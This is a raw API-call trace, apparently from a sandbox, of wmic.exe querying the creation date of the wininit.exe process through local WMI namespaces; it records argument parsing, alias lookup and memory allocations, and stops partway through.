[0401.261] GetCommandLineW () returned="WMIC PROCESS where name=\"wininit.exe\" get creationdate "
[0401.261] malloc (_Size=0x80) returned 0x206e60
[0401.261] memcpy_s (in: _Destination=0x206e60, _DestinationSize=0x7e, _Source=0x242718, _SourceSize=0x70 | out: _Destination=0x206e60) returned 0x0
[0401.261] malloc (_Size=0x18) returned 0x209040
[0401.262] malloc (_Size=0x18) returned 0x209560
[0401.262] malloc (_Size=0x18) returned 0x209580
[0401.262] malloc (_Size=0x18) returned 0x2095a0
[0401.262] malloc (_Size=0x80) returned 0x20cb50
[0401.262] GetLocalTime (in: lpSystemTime=0x16f750 | out: lpSystemTime=0x16f750*(wYear=0x7e8, wMonth=0x6, wDayOfWeek=0x1, wDay=0x3, wHour=0xb, wMinute=0x21, wSecond=0x1, wMilliseconds=0x44))
[0401.262] _vsnwprintf (in: _Buffer=0x20cb50, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x16f6a8 | out: _Buffer="06-03-2024T11:33:01") returned 19
[0401.262] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.262] malloc (_Size=0x6a) returned 0x20cbe0
[0401.262] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.262] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.262] malloc (_Size=0x6a) returned 0x20cc60
[0401.263] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.263] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.263] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.263] malloc (_Size=0x10) returned 0x2095c0
[0401.263] lstrlenW (lpString="PROCESS") returned 7
[0401.263] _wcsicmp (_String1="PROCESS", _String2="\"NULL\"") returned 78
[0401.263] malloc (_Size=0x10) returned 0x2095e0
[0401.263] malloc (_Size=0x8) returned 0x20cce0
[0401.263] free (_Block=0x0)
[0401.263] free (_Block=0x2095c0)
[0401.263] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.263] malloc (_Size=0xc) returned 0x2095c0
[0401.263] lstrlenW (lpString="where") returned 5
[0401.264] _wcsicmp (_String1="where", _String2="\"NULL\"") returned 85
[0401.264] malloc (_Size=0xc) returned 0x209600
[0401.264] malloc (_Size=0x10) returned 0x209620
[0401.264] memmove_s (in: _Destination=0x209620, _DestinationSize=0x8, _Source=0x20cce0, _SourceSize=0x8 | out: _Destination=0x209620) returned 0x0
[0401.264] free (_Block=0x20cce0)
[0401.264] free (_Block=0x0)
[0401.264] free (_Block=0x2095c0)
[0401.264] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.264] lstrlenW (lpString="WHERE") returned 5
[0401.264] lstrlenW (lpString="where") returned 5
[0401.264] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2
[0401.264] malloc (_Size=0x26) returned 0x20cce0
[0401.264] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.264] _wcsicmp (_String1="name=\"wininit.exe\"", _String2="\"NULL\"") returned 76
[0401.264] malloc (_Size=0x26) returned 0x20cd10
[0401.264] malloc (_Size=0x18) returned 0x2095c0
[0401.265] memmove_s (in: _Destination=0x2095c0, _DestinationSize=0x10, _Source=0x209620, _SourceSize=0x10 | out: _Destination=0x2095c0) returned 0x0
[0401.265] free (_Block=0x209620)
[0401.265] free (_Block=0x0)
[0401.265] free (_Block=0x20cce0)
[0401.265] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.265] malloc (_Size=0x8) returned 0x20cce0
[0401.265] lstrlenW (lpString="get") returned 3
[0401.265] _wcsicmp (_String1="get", _String2="\"NULL\"") returned 69
[0401.265] malloc (_Size=0x8) returned 0x20cd40
[0401.265] malloc (_Size=0x20) returned 0x20cd60
[0401.265] memmove_s (in: _Destination=0x20cd60, _DestinationSize=0x18, _Source=0x2095c0, _SourceSize=0x18 | out: _Destination=0x20cd60) returned 0x0
[0401.265] free (_Block=0x2095c0)
[0401.265] free (_Block=0x0)
[0401.265] free (_Block=0x20cce0)
[0401.265] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.265] malloc (_Size=0x1a) returned 0x20cce0
[0401.266] lstrlenW (lpString="creationdate") returned 12
[0401.266] _wcsicmp (_String1="creationdate", _String2="\"NULL\"") returned 65
[0401.266] malloc (_Size=0x1a) returned 0x20cd90
[0401.266] malloc (_Size=0x30) returned 0x208600
[0401.266] memmove_s (in: _Destination=0x208600, _DestinationSize=0x20, _Source=0x20cd60, _SourceSize=0x20 | out: _Destination=0x208600) returned 0x0
[0401.266] free (_Block=0x20cd60)
[0401.266] free (_Block=0x0)
[0401.266] free (_Block=0x20cce0)
[0401.266] lstrlenW (lpString=" PROCESS where name=\"wininit.exe\" get creationdate ") returned 52
[0401.266] malloc (_Size=0x28) returned 0x20cce0
[0401.266] lstrlenW (lpString="QUIT") returned 4
[0401.266] lstrlenW (lpString="PROCESS") returned 7
[0401.266] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 1
[0401.267] lstrlenW (lpString="EXIT") returned 4
[0401.267] lstrlenW (lpString="PROCESS") returned 7
[0401.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3
[0401.267] free (_Block=0x20cce0)
[0401.267] WbemLocator:IUnknown:AddRef (This=0x26cc20) returned 0x2
[0401.267] malloc (_Size=0x28) returned 0x20cce0
[0401.267] lstrlenW (lpString="/") returned 1
[0401.267] lstrlenW (lpString="PROCESS") returned 7
[0401.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="/", cchCount2=1) returned 3
[0401.267] lstrlenW (lpString="-") returned 1
[0401.267] lstrlenW (lpString="PROCESS") returned 7
[0401.267] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="-", cchCount2=1) returned 3
[0401.268] lstrlenW (lpString="CLASS") returned 5
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3
[0401.268] lstrlenW (lpString="PATH") returned 4
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3
[0401.268] lstrlenW (lpString="CONTEXT") returned 7
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.268] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="PROCESS", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.268] malloc (_Size=0x10) returned 0x2095c0
[0401.268] lstrlenW (lpString="PROCESS") returned 7
[0401.269] GetCurrentThreadId () returned 0xdf0
[0401.269] ??0CHString@@QEAA@XZ () returned 0x16f560
[0401.269] malloc (_Size=0x18) returned 0x209620
[0401.269] malloc (_Size=0x18) returned 0x209640
[0401.269] WbemLocator:IWbemLocator:ConnectServer (in: This=0x26cc20, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffaa2998 | out: ppNamespace=0xffaa2998*=0x2d6560) returned 0x0
[0401.383] free (_Block=0x209640)
[0401.383] free (_Block=0x209620)
[0401.383] CoSetProxyBlanket (pProxy=0x2d6560, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0401.384] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.384] GetCurrentThreadId () returned 0xdf0
[0401.384] ??0CHString@@QEAA@XZ () returned 0x16f3f8
[0401.384] malloc (_Size=0x18) returned 0x209620
[0401.384] malloc (_Size=0x18) returned 0x209640
[0401.385] malloc (_Size=0x18) returned 0x209660
[0401.385] malloc (_Size=0x18) returned 0x209680
[0401.385] SysStringLen (param_1="root\\cli") returned 0x8
[0401.385] SysStringLen (param_1="\\") returned 0x1
[0401.385] memcpy (in: _Dst=0x2e4d18, _Src=0x2e4cb8, _Size=0x12 | out: _Dst=0x2e4d18) returned 0x2e4d18
[0401.385] memcpy (in: _Dst=0x2e4d28, _Src=0x2e4c58, _Size=0x4 | out: _Dst=0x2e4d28) returned 0x2e4d28
[0401.385] malloc (_Size=0x18) returned 0x2096a0
[0401.385] SysStringLen (param_1="root\\cli\\") returned 0x9
[0401.385] SysStringLen (param_1="ms_409") returned 0x6
[0401.386] memcpy (in: _Dst=0x256718, _Src=0x2e4d18, _Size=0x14 | out: _Dst=0x256718) returned 0x256718
[0401.386] memcpy (in: _Dst=0x25672a, _Src=0x2e4c88, _Size=0xe | out: _Dst=0x25672a) returned 0x25672a
[0401.386] free (_Block=0x209680)
[0401.386] free (_Block=0x209660)
[0401.386] free (_Block=0x209640)
[0401.386] free (_Block=0x209620)
[0401.386] malloc (_Size=0x18) returned 0x209620
[0401.386] WbemLocator:IWbemLocator:ConnectServer (in: This=0x26cc20, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xffaa29a0 | out: ppNamespace=0xffaa29a0*=0x2d6680) returned 0x0
[0401.408] free (_Block=0x209620)
[0401.408] free (_Block=0x2096a0)
[0401.408] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.408] GetCurrentThreadId () returned 0xdf0
[0401.408] ??0CHString@@QEAA@XZ () returned 0x16f570
[0401.408] malloc (_Size=0x18) returned 0x2096a0
[0401.408] malloc (_Size=0x18) returned 0x209620
[0401.409] malloc (_Size=0x18) returned 0x209640
[0401.409] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0401.409] malloc (_Size=0x3a) returned 0x20cdc0
[0401.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MSFT_CliAlias.FriendlyName='", cbMultiByte=-1, lpWideCharStr=0x20cdc0, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0401.409] free (_Block=0x20cdc0)
[0401.409] malloc (_Size=0x18) returned 0x209660
[0401.409] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0401.409] SysStringLen (param_1="PROCESS") returned 0x7
[0401.409] memcpy (in: _Dst=0x2a6ed8, _Src=0x2742a8, _Size=0x3a | out: _Dst=0x2a6ed8) returned 0x2a6ed8
[0401.409] memcpy (in: _Dst=0x2a6f10, _Src=0x2e4cb8, _Size=0x10 | out: _Dst=0x2a6f10) returned 0x2a6f10
[0401.409] malloc (_Size=0x18) returned 0x209680
[0401.409] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='PROCESS") returned 0x23
[0401.409] SysStringLen (param_1="'") returned 0x1
[0401.410] memcpy (in: _Dst=0x2a6e68, _Src=0x2a6ed8, _Size=0x48 | out: _Dst=0x2a6e68) returned 0x2a6e68
[0401.410] memcpy (in: _Dst=0x2a6eae, _Src=0x2e4d18, _Size=0x4 | out: _Dst=0x2a6eae) returned 0x2a6eae
[0401.410] free (_Block=0x209660)
[0401.410] free (_Block=0x209640)
[0401.410] free (_Block=0x209620)
[0401.410] free (_Block=0x2096a0)
[0401.410] IWbemServices:GetObject (in: This=0x2d6560, strObjectPath="MSFT_CliAlias.FriendlyName='PROCESS'", lFlags=0, pCtx=0x0, ppObject=0x16f578*=0x0, ppCallResult=0x0 | out: ppObject=0x16f578*=0x2c8c70, ppCallResult=0x0) returned 0x0
[0401.512] malloc (_Size=0x18) returned 0x2096a0
[0401.512] IWbemClassObject:Get (in: This=0x2c8c70, wszName="Target", lFlags=0, pVal=0x16f4a0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0xffaa2998, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f4a0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Process", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.512] free (_Block=0x2096a0)
[0401.512] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.512] malloc (_Size=0x38) returned 0x208640
[0401.512] lstrlenW (lpString="Select * from Win32_Process") returned 27
[0401.513] malloc (_Size=0x18) returned 0x2096a0
[0401.513] IWbemClassObject:Get (in: This=0x2c8c70, wszName="PWhere", lFlags=0, pVal=0x16f4a0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2bc478, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f4a0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE ProcessId='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.513] free (_Block=0x2096a0)
[0401.513] lstrlenW (lpString="WHERE ProcessId='#'") returned 19
[0401.513] malloc (_Size=0x28) returned 0x20cd60
[0401.513] lstrlenW (lpString="WHERE ProcessId='#'") returned 19
[0401.513] malloc (_Size=0x18) returned 0x2096a0
[0401.514] IWbemClassObject:Get (in: This=0x2c8c70, wszName="Connection", lFlags=0, pVal=0x16f4a0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2bc478, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f4a0*(varType=0xd, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c9150, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.514] free (_Block=0x2096a0)
[0401.514] IUnknown:QueryInterface (in: This=0x2c9150, riid=0xffa37360*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x16f490 | out: ppvObject=0x16f490*=0x2c9150) returned 0x0
[0401.514] GetCurrentThreadId () returned 0xdf0
[0401.514] ??0CHString@@QEAA@XZ () returned 0x16f3b8
[0401.514] malloc (_Size=0x18) returned 0x2096a0
[0401.514] IWbemClassObject:Get (in: This=0x2c9150, wszName="Namespace", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0xffa4738f, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\CIMV2", varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.514] free (_Block=0x2096a0)
[0401.514] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0401.514] malloc (_Size=0x16) returned 0x2096a0
[0401.515] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0401.515] malloc (_Size=0x18) returned 0x209620
[0401.515] IWbemClassObject:Get (in: This=0x2c9150, wszName="Locale", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="ms_409", varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.515] free (_Block=0x209620)
[0401.515] lstrlenW (lpString="ms_409") returned 6
[0401.515] malloc (_Size=0xe) returned 0x209620
[0401.515] lstrlenW (lpString="ms_409") returned 6
[0401.515] malloc (_Size=0x18) returned 0x209640
[0401.516] IWbemClassObject:Get (in: This=0x2c9150, wszName="User", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.516] free (_Block=0x209640)
[0401.516] malloc (_Size=0x18) returned 0x209640
[0401.516] IWbemClassObject:Get (in: This=0x2c9150, wszName="Password", lFlags=0, pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.516] free (_Block=0x209640)
[0401.516] malloc (_Size=0x18) returned 0x209640
[0401.516] IWbemClassObject:Get (in: This=0x2c9150, wszName="Server", lFlags=0, pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=".", varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.516] free (_Block=0x209640)
[0401.516] lstrlenW (lpString=".") returned 1
[0401.516] malloc (_Size=0x4) returned 0x20cdc0
[0401.517] lstrlenW (lpString=".") returned 1
[0401.517] malloc (_Size=0x18) returned 0x209640
[0401.517] IWbemClassObject:Get (in: This=0x2c9150, wszName="Authority", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x1, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0x2096a0), pType=0x0, plFlavor=0x0) returned 0x0
[0401.517] free (_Block=0x209640)
[0401.517] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.517] IUnknown:Release (This=0x2c9150) returned 0x1
[0401.517] GetCurrentThreadId () returned 0xdf0
[0401.518] ??0CHString@@QEAA@XZ () returned 0x16f3b8
[0401.518] malloc (_Size=0x18) returned 0x209640
[0401.518] IWbemClassObject:Get (in: This=0x2c8c70, wszName="__RELPATH", lFlags=0, pVal=0x16f3e0*(varType=0x0, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e4c58, varVal2=0xd), pType=0x0, plFlavor=0x0 | out: pVal=0x16f3e0*(varType=0x8, wReserved1=0xffaa, wReserved2=0x0, wReserved3=0x0, varVal1="MSFT_CliAlias.FriendlyName=\"Process\"", varVal2=0xd), pType=0x0, plFlavor=0x0) returned 0x0
[0401.518] free (_Block=0x209640)
[0401.518] malloc (_Size=0x18) returned 0x209640
[0401.518] GetCurrentThreadId () returned 0xdf0
[0401.518] ??0CHString@@QEAA@XZ () returned 0x16f238
[0401.519] ??0CHString@@QEAA@PEBG@Z () returned 0x16f250
[0401.519] ??0CHString@@QEAA@AEBV0@@Z () returned 0x16f1e0
[0401.519] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0401.519] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x20cde0
[0401.519] ?Find@CHString@@QEBAHPEBG@Z () returned 0x1b
[0401.519] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f1a0
[0401.519] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f1e8
[0401.519] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f250
[0401.520] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.520] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.520] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f1a8
[0401.520] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f1e0
[0401.520] ??1CHString@@QEAA@XZ () returned 0x1
[0401.520] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x20ce40
[0401.520] ?Find@CHString@@QEBAHPEBG@Z () returned 0x7
[0401.520] ?Left@CHString@@QEBA?AV1@H@Z () returned 0x16f1a0
[0401.520] ??H@YA?AVCHString@@AEBV0@PEBG@Z () returned 0x16f1e8
[0401.520] ??YCHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f250
[0401.520] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.520] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.520] ?Mid@CHString@@QEBA?AV1@H@Z () returned 0x16f1a8
[0401.520] ??4CHString@@QEAAAEBV0@AEBV0@@Z () returned 0x16f1e0
[0401.520] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.520] ?GetData@CHString@@IEBAPEAUCHStringData@@XZ () returned 0x7fef4e0c960
[0401.521] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.521] malloc (_Size=0x18) returned 0x209660
[0401.521] malloc (_Size=0x18) returned 0x2096c0
[0401.521] malloc (_Size=0x18) returned 0x2096e0
[0401.521] malloc (_Size=0x18) returned 0x209700
[0401.521] malloc (_Size=0x18) returned 0x209720
[0401.521] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
[0401.521] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
[0401.521] memcpy (in: _Dst=0x2df748, _Src=0x2e05b8, _Size=0x7a | out: _Dst=0x2df748) returned 0x2df748
[0401.521] memcpy (in: _Dst=0x2df7c0, _Src=0x256718, _Size=0x30 | out: _Dst=0x2df7c0) returned 0x2df7c0
[0401.521] malloc (_Size=0x18) returned 0x209740
[0401.522] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
[0401.522] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x26
[0401.522] memcpy (in: _Dst=0x2c8f28, _Src=0x2df748, _Size=0xa8 | out: _Dst=0x2c8f28) returned 0x2c8f28
[0401.522] memcpy (in: _Dst=0x2c8fce, _Src=0x2d9008, _Size=0x4e | out: _Dst=0x2c8fce) returned 0x2c8fce
[0401.522] malloc (_Size=0x18) returned 0x209760
[0401.522] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"") returned 0x79
[0401.522] SysStringLen (param_1="\"") returned 0x1
[0401.522] memcpy (in: _Dst=0x2c9038, _Src=0x2c8f28, _Size=0xf4 | out: _Dst=0x2c9038) returned 0x2c9038
[0401.522] memcpy (in: _Dst=0x2c912a, _Src=0x2e4c58, _Size=0x4 | out: _Dst=0x2c912a) returned 0x2c912a
[0401.522] free (_Block=0x209740)
[0401.522] free (_Block=0x209720)
[0401.522] free (_Block=0x209700)
[0401.523] free (_Block=0x2096e0)
[0401.523] free (_Block=0x2096c0)
[0401.523] free (_Block=0x209660)
[0401.523] IWbemServices:GetObject (in: This=0x2d6680, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"Process\\\"\"", lFlags=0, pCtx=0x0, ppObject=0x16f228*=0x0, ppCallResult=0x0 | out: ppObject=0x16f228*=0x2c93f0, ppCallResult=0x0) returned 0x0
[0401.529] malloc (_Size=0x18) returned 0x209660
[0401.529] IWbemClassObject:Get (in: This=0x2c93f0, wszName="Text", lFlags=0, pVal=0x16f260*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffaa2ac0, varVal2=0x18), pType=0x0, plFlavor=0x0 | out: pVal=0x16f260*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2e9480*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x26e1c0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x18), pType=0x0, plFlavor=0x0) returned 0x0
[0401.530] free (_Block=0x209660)
[0401.530] SafeArrayGetLBound (in: psa=0x2e9480, nDim=0x1, plLbound=0x16f240 | out: plLbound=0x16f240) returned 0x0
[0401.530] SafeArrayGetUBound (in: psa=0x2e9480, nDim=0x1, plUbound=0x16f230 | out: plUbound=0x16f230) returned 0x0
[0401.530] SafeArrayGetElement (in: psa=0x2e9480, rgIndices=0x16f224, pv=0x16f278 | out: pv=0x16f278) returned 0x0
[0401.530] malloc (_Size=0x18) returned 0x209660
[0401.530] malloc (_Size=0x18) returned 0x2096c0
[0401.530] SysStringLen (param_1="Process management. ") returned 0x14
[0401.530] memcpy (in: _Dst=0x2c6278, _Src=0x2c6228, _Size=0x2a | out: _Dst=0x2c6278) returned 0x2c6278
[0401.531] free (_Block=0x209660)
[0401.531] IUnknown:Release (This=0x2c93f0) returned 0x0
[0401.531] free (_Block=0x209760)
[0401.531] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0401.531] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.531] free (_Block=0x209640)
[0401.531] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.531] lstrlenW (lpString="Process management. ") returned 20
[0401.531] malloc (_Size=0x2a) returned 0x208680
[0401.531] lstrlenW (lpString="Process management. ") returned 20
[0401.532] free (_Block=0x2096c0)
[0401.532] IUnknown:Release (This=0x2c8c70) returned 0x0
[0401.532] free (_Block=0x209680)
[0401.532] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0401.532] lstrlenW (lpString="PATH") returned 4
[0401.532] lstrlenW (lpString="where") returned 5
[0401.532] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="PATH", cchCount2=4) returned 3
[0401.532] lstrlenW (lpString="WHERE") returned 5
[0401.532] lstrlenW (lpString="where") returned 5
[0401.532] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="where", cchCount1=5, lpString2="WHERE", cchCount2=5) returned 2
[0401.532] lstrlenW (lpString="/") returned 1
[0401.532] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.532] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name=\"wininit.exe\"", cchCount1=18, lpString2="/", cchCount2=1) returned 3
[0401.533] lstrlenW (lpString="-") returned 1
[0401.533] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.533] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="name=\"wininit.exe\"", cchCount1=18, lpString2="-", cchCount2=1) returned 3
[0401.533] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.533] malloc (_Size=0x26) returned 0x20cde0
[0401.533] lstrlenW (lpString="name=\"wininit.exe\"") returned 18
[0401.533] lstrlenW (lpString="/") returned 1
[0401.533] lstrlenW (lpString="get") returned 3
[0401.533] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
[0401.533] lstrlenW (lpString="-") returned 1
[0401.533] lstrlenW (lpString="get") returned 3
[0401.533] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
[0401.533] lstrlenW (lpString="get") returned 3
[0401.533] malloc (_Size=0x8) returned 0x20ce10
[0401.533] lstrlenW (lpString="get") returned 3
[0401.534] lstrlenW (lpString="GET") returned 3
[0401.534] lstrlenW (lpString="get") returned 3
[0401.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0401.534] lstrlenW (lpString="/") returned 1
[0401.534] lstrlenW (lpString="creationdate") returned 12
[0401.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="/", cchCount2=1) returned 3
[0401.534] lstrlenW (lpString="-") returned 1
[0401.534] lstrlenW (lpString="creationdate") returned 12
[0401.534] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="creationdate", cchCount1=12, lpString2="-", cchCount2=1) returned 3
[0401.534] lstrlenW (lpString="creationdate") returned 12
[0401.534] malloc (_Size=0x1a) returned 0x20ce30
[0401.534] lstrlenW (lpString="creationdate") returned 12
[0401.535] malloc (_Size=0x8) returned 0x20ce60
[0401.535] GetCurrentThreadId () returned 0xdf0
[0401.535] ??0CHString@@QEAA@XZ () returned 0x16f118
[0401.535] malloc (_Size=0x8) returned 0x20ce80
[0401.535] memmove_s (in: _Destination=0x20ce80, _DestinationSize=0x8, _Source=0x20ce60, _SourceSize=0x8 | out: _Destination=0x20ce80) returned 0x0
[0401.535] malloc (_Size=0x18) returned 0x209680
[0401.535] malloc (_Size=0x18) returned 0x2096c0
[0401.536] malloc (_Size=0x18) returned 0x209640
